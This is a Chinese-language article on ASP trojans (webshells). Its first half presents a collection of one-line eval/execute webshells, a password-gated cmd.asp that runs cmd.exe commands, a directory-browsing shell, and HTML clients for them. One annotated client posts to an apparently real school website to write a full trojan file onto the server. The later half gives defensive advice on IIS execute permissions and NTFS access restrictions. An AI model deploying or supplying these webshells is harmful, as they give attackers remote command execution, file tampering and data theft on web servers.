asp木马(什么是asp木马)

大家好，asp木马相信很多的网友都不是很明白，包括什么是asp木马也是一样，不过没有关系，接下来就来为大家分享关于asp木马和什么是asp木马的一些知识点，大家可以关注收藏，免得下次来找不到哦，下面我们开始吧！

超高分求 asp一句话木马~

ASP一句话木马大全！

<%eval request("MH")%>

<%execute request("MH")%>

<%execute(request("MH"))%>

<%If Request("MH")<>"" Then Execute(Request("MH"))%>

<%if request("MH")<>""then session("MH")=request("MH"):end if:if session("MH")<>"" then execute session("MH")%>

<SCRIPT language=VBScript runat="server">execute request("MH")</SCRIPT>

<%@ Page Language="Jscript"%>

<%eval(Request.Item["MH"],"unsafe");%>

1 asp一句话木马

一句话木马服务器端

带验证:

——————————————cmd.asp————————————————

<%

if request("authkey")="pic16f873a" then

%>

<textarea readonly cols=80 rows=25>

<%response.write server.createobject("wscript.shell").exec("cmd.exe/c"&request("cmd")).stdout.readall%>

</textarea>

<%

end if

%>

带验证客户端

——————————————cmd.html————————————————

<HTML>

<HEAD>

<meta http-equiv="Content-Type" content="text/html; charset=gbk">

</HEAD>

<div align=center>

<FORM method=post name=frm target=_blank>

Host:<input type=text name=act size=65 value="http://">

<br>

<br>

Cmd:<input type=text name=cmd size=65 value="cmd">

<br>

<br>

<input type=hidden name=authkey value="pic16f873a">

<Input name=Send

onclick="Javascipt:frm.action=document.frm.act.value;

frm.submit();"

type=button value="Send Command">

</FORM>

</div>

目录浏览

服务器端

_________________________________________

<%

if request("authkey")="pic16f873a" then

szPara= Request.Form("path")

set shell=server.createobject("shell.application")

set dir1=shell.namespace(szPara)

set diritems=dir1.items

for each iii in diritems

response.write iii.path&"<font color=blue>["& iii.size&"]</font><br>"

next

end if

%>

_________________________________________

客户端

__________________________________________

<HTML>

<HEAD>

<meta http-equiv="Content-Type" content="text/html; charset=gbk">

</HEAD>

<div align=center>

<FORM method=post name=frm target=_blank>

Host:<input type=text name=act size=65 value="http://">

<br>

<br>

Path:<input type=text name=path size=65 value="C:\">

<br>

<br>

<input type=hidden name=authkey value="pic16f873a">

<Input name=Send onclick="Javascipt:frm.action=document.frm.act.value;frm.submit();"

type=button value="Send Command">

</FORM>

</div>

一句话木马客户端源文件：

里面涉及到一些脚本知识，我就只讲解一下功能和简单注释，不详细讲了，大家只要注意几个注意点就行了

***********************************************************

<form action=http://cjy.xjife.edu.cn/news/ebook/db/ebook.asp method=post>

//"action="后面是需要修改的以asp命名的数据库的提交地址

//这个标签的意思是建立一个表单以post方式提交给连接http://cjy.xjife.edu.cn/news/ebook/db/ebook.asp处理

<textarea name=value cols=120 rows=10 width=45>

//这里的value值根据服务端<%execute request("value")%>中value而设定

//可以自行修改成<%execute request("p")%>相应这里的value值也必须改为p

set lP=server.createObject("Adodb.Stream")//建立流对象，有了对象才可以使用它固有的属性和方法

lP.Open//打开

lP.Type=2//以文本方式

lP.CharSet="gb2312"//字体标准

lP.writetext request("joeving")//取得木马内容参数joeving可以自己定义但必须和下面的name=joeving相对应

lP.SaveToFile server.mappath("wei.asp"),2

//将木马内容以覆盖文件的方式写入wei.asp

//2就是已覆盖的方式，这里的wei.asp也是可以自己定义的，如定义成1.asp

//但和下面的response.redirect"wei.asp"中wei.asp的保持一致

lP.Close//关闭对象

set lP=nothing//释放对象

response.redirect"wei.asp"//转向生成的wei.asp和上面的wei.asp相对应，也就是你熟悉的asp木马登陆界面

</textarea>

//这段程序的功能：利用插入到数据库文件的<%execute request("value")%>这段代码执行第一个textarea中的内容，并将添加的木马内容写入和指向wei.asp，这样就相当于在服务器上建立了个asp木马文件，这样就可以取得webshell了

<textarea name=joeving cols=120 rows=10 width=45>添入生成木马的内容/textarea><BR><center><br>

//这段标签是你用来添加木马内容用的

<input type=submit value=提交>

</form>

***********************************************************

//程序的主要框架是

<form>

<textarea></textarea>//取得木马内容并用无组件上传技术在服务器端创建asp木马文件并显示

<textarea></textarea>//添加木马内容用的

</form>

其实都是些很简单的一些html和asp的知识，大家不妨自己写个自己的木马客户端~~~呵呵

什么是asp木马

预备知识：ASP编程 ASP木马入侵原理要预防木马的入侵，就要先了解入侵的原理。想通过ASP木马入侵，必须先将木马上传到目标空间，然后直接在客户端浏览器里面运行木马，接着就可以进行文件修改、目录删除等等具有破坏性的工作。黑客入侵ASP网站一般使用两种方式：第一种是上传木马后，利用木马以及操作系统漏洞在Windows启动项里添加一个批处理文件，用来添加管理员账号，然后用管理员账号停止防火墙运行和进行文件修改删除等操作。第二种是上传木马后，直接通过木马删除网站里面的目录和文件。找准关键对症下药通过分析可以发现，我们提到的两种入侵方式都是利用ASP网站的上传功能，先上传木马，然后借助木马对文件进行修改删除等操作。简单说来，要做的第一步就是阻止ASP文件的上传；其次，如果被上传了ASP木马，就要杜绝木马的运行。 ASP木马本身就是个ASP文件。所以很关键的一点是限制ASP文件的上传。一般ASP网站本身就有文件上传功能，并且默认是限制了ASP文件的上传，不过黑客能够想方设法上传他们的木马文件。安全与便捷并行要防患于未然，一些前期工作必须先做好。首先就是养成及时备份的习惯；其次，如果你的网站采用ACCESS数据库，那么要保证你网站的主数据库不能以MDB为扩展名，将扩展名改成ASP，这样可以防止黑客直接下载到网站数据库并猜解网站管理员密码；第三，网站管理员密码位数推荐超过12位。限制ASP执行权限虽然无法通过杀毒软件查杀ASP木马，但可以采取其他方法进行有效防范。就知名的动易网站管理系统或者动网论坛来说，默认是允许注册用户上传文件的。黑客可以利用工具将ASP木马伪装后上传至服务器。关键就在于他们上传文件所存放的目录是固定的，具体说就是通过网站上传的文件只会出现在我们ASP网站程序所指定的目录下。如果要完全限制网站注册用户上传文件的权限是不现实的。所以，我们能做的第一步，就是禁止ASP文件在此目录的执行权限。目的就是让上传来的ASP木马无法执行。具体方法如下：打开IIS，右键点击网站里面供上传的目录，点击属性，我们可以看到属性窗口（图2）；将此目录的“执行权限”设置成“无”；用同样的方法，再将存放数据库的文件夹以及其余几个可供用户上传文件的文件夹的“执行权限”全都设置成“无”。服务器上的安全设置即使限制了上传目录的ASP的执行权限，但也无法保证服务器的绝对安全。所以，服务器上面也要进行一些设置。服务器操作系统以Windows 2003为例，首先当然是要将磁盘转为NTFS格式。其次，可以将默认的Administrator改名，并设置足够位数的密码（推荐12位以上）。为了欺骗黑客，还可以另外建一个名为Administrator的账号，并设置密码，赋予最低权限。在Windows 2003操作系统里面设置相应文件夹的权限。由于网站做好后一般一段时间都不会随便对源代码进行修改，所以可以对不需要进行修改的地方设置只读权限，仅开放几个上传的文件夹的可写权限。对系统默认的Everyone的权限进行限制，拒绝Everyone的删除以及修改权限。仅在我们需要对网站进行修改的时候，才暂时将此限制去掉。具体操作过程如下：对存放网站的文件夹点击右键，点击“共享和安全”；在安全选项卡上，可以看到属性窗口；为限制Everyone的权限，点击下面的高级按钮；在弹出的“高级安全设置”对话框中的“权限”选项卡上，点击“添加”；在“选择用户或组”底下的框中输入名称“Everyone”，再点击“确定”；在出现的对话框中勾选“创建文件/写入数据”、“创建文件夹/附加数据”、“删除子文件夹及文件”、“删除”、“更改权限”的拒绝权限，并设置将它应用到“该文件夹及文件”。同样的方法，再对网站里面的各个子文件夹进行设置，拒绝一些网管对不需要修改的文件夹的更改、写入数据等权限。要注意的是，供网站用户上传文件的文件夹，要保留其写入的权限。由于Windows的用户组权限是拒绝优先，所以设置好后要测试，供上传的文件夹不能限制其写入权限。我们做好了这些权限的设置之后，可以自己试着对网站的文件或者文件夹进行改名、删除等操作，看看是否会提示拒绝访问或者没有这个权限。

asp木马是什么意思

asp就是种写网页的语言，就像可以写故事的汉语一样，可以写故事娱悦来人，可以写书本来教育，当被心灵不正的人用，它就会写一些黑暗的东西，比如什么反动的宣传什么的。ASP木马就是用ASP语言写出来的木马程序。你上网打开的网页有些就是ASP，如果这个ASP里面有木马，你可能就会中。

木马程序就是偷偷地跑到你电脑里面，干一些对你不利的事情的程序，比如盗你的QQ密码等等。

关于asp木马到此分享完毕，希望能帮助到您。